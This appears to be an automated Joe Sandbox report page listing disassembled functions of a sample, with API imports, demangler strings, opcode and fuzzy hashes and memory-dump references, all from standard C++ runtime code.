Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
Instruction ID: 1256938acd2c574ff62d9e10e27bf88692f3f7bb98adc8a0612c1df1af4a7155
Opcode Fuzzy Hash: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
Instruction Fuzzy Hash: 5351952363AA8742E7946F249C9037EA7B1EF48FC2F980039CA5D45991DF2CF5A5D270

Function 00007FF779707B80 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF779707C1B
_assert.MSVCRT ref: 00007FF7797080BC

Part of subcall function 00007FF7796F3F50: fflush.MSVCRT ref: 00007FF7796F3F8F
Part of subcall function 00007FF7796F3F50: RtlUnwindEx.KERNEL32 ref: 00007FF7796F40A6
Part of subcall function 00007FF7796F3F50: fflush.MSVCRT ref: 00007FF7796F4106
Part of subcall function 00007FF7796F3F50: abort.MSVCRT ref: 00007FF7796F410B

Strings

yptn, xrefs: 00007FF779707B80
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF7797080A8
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF7797080AF

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush$Unwind_assertabortmalloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
API String ID: 2460331008-2552725819
Opcode ID: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
Instruction ID: 232469c020ac1507a2975b3b35783e6c9c7a1397bc5227c04983f65209bb3439
Opcode Fuzzy Hash: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
Instruction Fuzzy Hash: 93E1B43363AB8286EA649F15D8443B9B7B4EB48BC0F954135DA8D0B791EF3CE151C3A0

Function 00007FF779702DF3 Relevance: 25.6, APIs: 17, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isxdigit.MSVCRT ref: 00007FF779702E0E
isxdigit.MSVCRT ref: 00007FF779702E20
isxdigit.MSVCRT ref: 00007FF779702E32
isxdigit.MSVCRT ref: 00007FF779702E44
isxdigit.MSVCRT ref: 00007FF779702E56
isxdigit.MSVCRT ref: 00007FF779702E68
isxdigit.MSVCRT ref: 00007FF779702E7A
isxdigit.MSVCRT ref: 00007FF779702E8C
isxdigit.MSVCRT ref: 00007FF779702E9E
isxdigit.MSVCRT ref: 00007FF779702EB0
isxdigit.MSVCRT ref: 00007FF779702EC2
isxdigit.MSVCRT ref: 00007FF779702ED4
isxdigit.MSVCRT ref: 00007FF779702EE6
isxdigit.MSVCRT ref: 00007FF779702EF8
isxdigit.MSVCRT ref: 00007FF779702F0A
isxdigit.MSVCRT ref: 00007FF779702F1C
malloc.MSVCRT ref: 00007FF779702F69

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
Instruction ID: 1a8d4aa634820ab3c0345fe9f1f572a1a5ce9bf8a7bebd3df7b4df32316435be
Opcode Fuzzy Hash: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
Instruction Fuzzy Hash: EA51892363AA8742E7946F249C9037EA7B1EF44FC2F980039CA5D45991DF2CF5A1D270

Function 00007FF7797082A0 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF7797082E7
realloc.MSVCRT ref: 00007FF779708385
malloc.MSVCRT ref: 00007FF77970839B
memcpy.MSVCRT ref: 00007FF7797083B6
_assert.MSVCRT ref: 00007FF779708410
realloc.MSVCRT ref: 00007FF779708476
realloc.MSVCRT ref: 00007FF7797084C5
realloc.MSVCRT ref: 00007FF77970851B
realloc.MSVCRT ref: 00007FF7797085BE
memcpy.MSVCRT ref: 00007FF7797085E0

Strings

yptn, xrefs: 00007FF7797082A0
Last != First && "Calling back() on empty vector!", xrefs: 00007FF7797083FC
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779708403

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcpy$_assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$yptn
API String ID: 3355138791-4068048850
Opcode ID: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
Instruction ID: 4b8fb2403ef50420c9f4da74687ca917b16f0061814dddcbb5096656add9f257
Opcode Fuzzy Hash: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
Instruction Fuzzy Hash: 5A91C173A26B8682EB65DF09E8446A9B3B5EB58BC0F848531DB8D47390EF3CD541C350

Function 00007FF77970F790 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.MSVCRT ref: 00007FF77970F849
realloc.MSVCRT ref: 00007FF77970F8E7
realloc.MSVCRT ref: 00007FF77970F934
realloc.MSVCRT ref: 00007FF77970F989
realloc.MSVCRT ref: 00007FF77970F9E7
memcpy.MSVCRT ref: 00007FF77970FA00
realloc.MSVCRT ref: 00007FF77970FA36
realloc.MSVCRT ref: 00007FF77970FB2C

Strings

objc_obj, xrefs: 00007FF77970F7BE
c_object, xrefs: 00007FF77970FA98
c_object, xrefs: 00007FF77970F7CB
objc_obj, xrefs: 00007FF77970FA8B

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID: c_object$c_object$objc_obj$objc_obj
API String ID: 1833655766-1179801904
Opcode ID: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
Instruction ID: ce4d79be2f2b4b7422f39e5caa8ae9a6a6fe186a532dbb409bf889ea43dfae77
Opcode Fuzzy Hash: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
Instruction Fuzzy Hash: 1DC173A7A26B4682EE64EF19E88526DA7B1EB99FC0F548431CB8D47790DF3CD441C350

Function 00007FF779717F20 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF779717F82
memset.MSVCRT ref: 00007FF779718015
wcscpy.MSVCRT ref: 00007FF77971806D
wcscat.MSVCRT ref: 00007FF779718078
wcslen.MSVCRT ref: 00007FF779718089
memset.MSVCRT ref: 00007FF7797181A4
wcscpy.MSVCRT ref: 00007FF779718203
wcscat.MSVCRT ref: 00007FF77971820E
wcslen.MSVCRT ref: 00007FF779718222

Strings

, xrefs: 00007FF7797182AB
@, xrefs: 00007FF7797180C1
@, xrefs: 00007FF779718266
0, xrefs: 00007FF7797180B6
0, xrefs: 00007FF77971825B

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset$wcscatwcscpywcslen
String ID: $0$0$@$@
API String ID: 4263182637-1413854666
Opcode ID: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
Instruction ID: 18bdfb0928f6d8017f3bea3969f60d05ccfa1aaf3496fb2cea29b0483c87b4ed
Opcode Fuzzy Hash: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
Instruction Fuzzy Hash: DBB18F6297E6C2C6E321AF14E8013ABF7B0FBC4384F801539EA8C566A5DF7CD1468B51

Function 00007FF77970CA90 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF77970CC08
memcpy.MSVCRT ref: 00007FF77970CC27
malloc.MSVCRT ref: 00007FF77970CC5B
malloc.MSVCRT ref: 00007FF77970CE46
memcpy.MSVCRT ref: 00007FF77970CE65

Strings

noexcept, xrefs: 00007FF77970CCB3

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpy
String ID: noexcept
API String ID: 3800483350-1409219070
Opcode ID: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
Instruction ID: 18d3ca69171a0f96e0d4c9716116c1d68ea69e87eb05d0efc232ba6b2ee0e10a
Opcode Fuzzy Hash: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
Instruction Fuzzy Hash: 1102B07363AB4286EAA09F19E84426AB7B5FB48B80F884535DB8D47791EF3CE451C350

Function 00007FF779717260 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 318COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 00007FF779717365
memset.MSVCRT ref: 00007FF77971742D
wcscpy.MSVCRT ref: 00007FF779717494
wcscat.MSVCRT ref: 00007FF77971749F
wcslen.MSVCRT ref: 00007FF7797174A7
wcslen.MSVCRT ref: 00007FF7797174C2
wcslen.MSVCRT ref: 00007FF779717540
wcslen.MSVCRT ref: 00007FF779717592

Strings

0, xrefs: 00007FF77971736A
`, xrefs: 00007FF779717729
X, xrefs: 00007FF779717711

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: wcslen$memsetwcscatwcscpywcsncmp
String ID: 0$X$`
API String ID: 329590056-2527496196
Opcode ID: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
Instruction ID: bdad9ea9ee696218489f03980679d7a9b387512c9ec2879e9db21b4a3263eecd
Opcode Fuzzy Hash: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
Instruction Fuzzy Hash: 1C027B2393AB82C2E720AF14E8403AAB7B0FB85794F804639DA9C477A5DF3CE155C750

Function 00007FF77970E230 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 266COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970E275
realloc.MSVCRT ref: 00007FF77970E2DB
realloc.MSVCRT ref: 00007FF77970E337
realloc.MSVCRT ref: 00007FF77970E39F
realloc.MSVCRT ref: 00007FF77970E3FA
realloc.MSVCRT ref: 00007FF77970E45A
realloc.MSVCRT ref: 00007FF77970E4C5
realloc.MSVCRT ref: 00007FF77970E513
realloc.MSVCRT ref: 00007FF77970E56F

Strings

restric, xrefs: 00007FF77970E46F
volatil, xrefs: 00007FF77970E40F

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
Instruction ID: 8693b10831b08c58555d11fb7499ce2b073b3e750c283630ca13d876906bb69c
Opcode Fuzzy Hash: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
Instruction Fuzzy Hash: E8B163B3A26B4683DA69DF59E94426DB371EB58BC0F408431DB9E477A0EF3CE4518350

Function 00007FF779709ED0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF779709EFC
realloc.MSVCRT ref: 00007FF779709FEC
realloc.MSVCRT ref: 00007FF77970A06C
realloc.MSVCRT ref: 00007FF77970A0E6
realloc.MSVCRT ref: 00007FF77970A146
realloc.MSVCRT ref: 00007FF77970A191
realloc.MSVCRT ref: 00007FF77970A1D2
memcpy.MSVCRT ref: 00007FF77970A1EC
realloc.MSVCRT ref: 00007FF77970A224

Strings

at offs, xrefs: 00007FF77970A081
set , xrefs: 00007FF77970A08F

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID: at offs$set
API String ID: 1059646398-2369781007
Opcode ID: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
Instruction ID: 9d6b802190f57953b9daa7e3d158fd638b38f38eb9dd4d842ce77e1be8060a7a
Opcode Fuzzy Hash: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
Instruction Fuzzy Hash: 84A1C2B3A26B8682EF299F15E8443A9A3B1FB58BC4F448531CB8D07794EF3CE5518350

Function 00007FF7796F6830 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7796F6952
memset.MSVCRT ref: 00007FF7796F69E3
fputwc.MSVCRT ref: 00007FF7796F6A5E
fputwc.MSVCRT ref: 00007FF7796F6ABE
fputwc.MSVCRT ref: 00007FF7796F6B1E

Strings

o, xrefs: 00007FF7796F6963
o, xrefs: 00007FF7796F6844
o, xrefs: 00007FF7796F6B3D
o, xrefs: 00007FF7796F69F5
o, xrefs: 00007FF7796F6892
o, xrefs: 00007FF7796F699E

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputwc$memset
String ID: o$o$o$o$o$o
API String ID: 822753988-2858737866
Opcode ID: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
Instruction ID: 94a6019293ae7160aba1f96303b75cf61e6f8fca4ee5548d30d3f3e3c8e121d9
Opcode Fuzzy Hash: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
Instruction Fuzzy Hash: 32912823E3A64786E3356E26D14073BA6F3EB14794F809331DB6A966D1FA3CE8518710

Function 00007FF77970C560 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970C5D6
realloc.MSVCRT ref: 00007FF77970C67B
realloc.MSVCRT ref: 00007FF77970C6D7
realloc.MSVCRT ref: 00007FF77970C744
realloc.MSVCRT ref: 00007FF77970C79F
realloc.MSVCRT ref: 00007FF77970C7FF
realloc.MSVCRT ref: 00007FF77970C86A
realloc.MSVCRT ref: 00007FF77970C8B8

Strings

volatil, xrefs: 00007FF77970C7B4
restric, xrefs: 00007FF77970C814

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
Instruction ID: 71521f83638283a726b16d309cfeeff5c94b9cc5f3d95b7534cdd5d2f1c4dae0
Opcode Fuzzy Hash: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
Instruction Fuzzy Hash: 66B183B7A26B4683DE69DF4AE94426DB371EB58BC0F548431CB8E477A0DF2CE4518350

Function 00007FF77970FED0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970FF80
malloc.MSVCRT ref: 00007FF77970FF9A
memcpy.MSVCRT ref: 00007FF77970FFB9
free.MSVCRT ref: 00007FF779710040
_assert.MSVCRT ref: 00007FF77971006B
free.MSVCRT ref: 00007FF779710085
realloc.MSVCRT ref: 00007FF7797100F7
memcpy.MSVCRT ref: 00007FF779710111

Strings

Index < size() && "Invalid access!", xrefs: 00007FF779710057
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF77971005E

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: freememcpyrealloc$_assertmalloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Index < size() && "Invalid access!"
API String ID: 3641880838-4289452498
Opcode ID: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
Instruction ID: db6ff8b060fba8203359841249fefb4a702f4d8293632194d1799223cb4e358e
Opcode Fuzzy Hash: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
Instruction Fuzzy Hash: 18518363A3AB4682EA64EF15E840279A7B1FB88BD4F944531EE8D07B65DE3CD481C350

Function 00007FF7797014B4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 171COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7797015B8
memcpy.MSVCRT ref: 00007FF7797015D7
realloc.MSVCRT ref: 00007FF7797019E9
_assert.MSVCRT ref: 00007FF779701E69

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF779701E55
_, xrefs: 00007FF77970198D
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779701E5C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
